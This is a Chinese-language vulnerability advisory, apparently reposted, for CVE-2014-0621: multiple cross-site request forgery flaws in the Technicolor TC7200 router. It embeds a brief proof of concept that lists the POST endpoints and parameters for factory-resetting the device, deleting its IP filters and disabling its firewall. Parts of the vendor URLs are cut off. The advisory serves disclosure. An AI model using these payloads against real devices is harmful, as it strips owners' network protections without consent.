Technicolor TC7200多个跨站脚本请求伪造漏洞

发布日期:2014-01-06
更新日期:2014-01-07

受影响系统:
technicolor TC7200 STD6.01.12
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2014-0621

Technicolor TC7200是调制解调器和路由器产品。

Technicolor TC7200在实现上存在多个跨站请求伪造漏洞,成功利用后可更改IP过滤选项、防火墙设置等。

<*来源:Jeroen
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

# Exploit Title: Technicolor TC7200 - Multiple CSRF Vulnerabilities
# Google Dork: N/A
# Date: 02-01-2013
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage:

ays/cable-modems-gateways/tc7200-tc7300
# Software Link: N/A
# Version: STD6.01.12
# Tested on: N/A
# CVE : CVE-2014-0621
#
# Proof of Concept:
#
#
## Payload for Factory Reset:

# POST    : <ip>/goform/system/factory
# Parameter: None
#
## Payload to disable the advanced options:
#
# POST    : <ip>/goform/advanced/options
# Parameter: None
#
## Payload to remove ip-filters:
#
# POST    : <ip>//goform/advanced/ip-filters
# Parameter: IpFilterAddressDelete1 = 1
#
## Payload to remove firewall settings

# POST    : <ip>/goform/advanced/firewall
# Parameter: cbFirewall = 1
#
# Check out the video at:

建议:
--------------------------------------------------------------------------------
厂商补丁:

technicolor
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

ays/cable-modems-gatewa

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/dc69920a28c9b2da8766f578fd623c90.html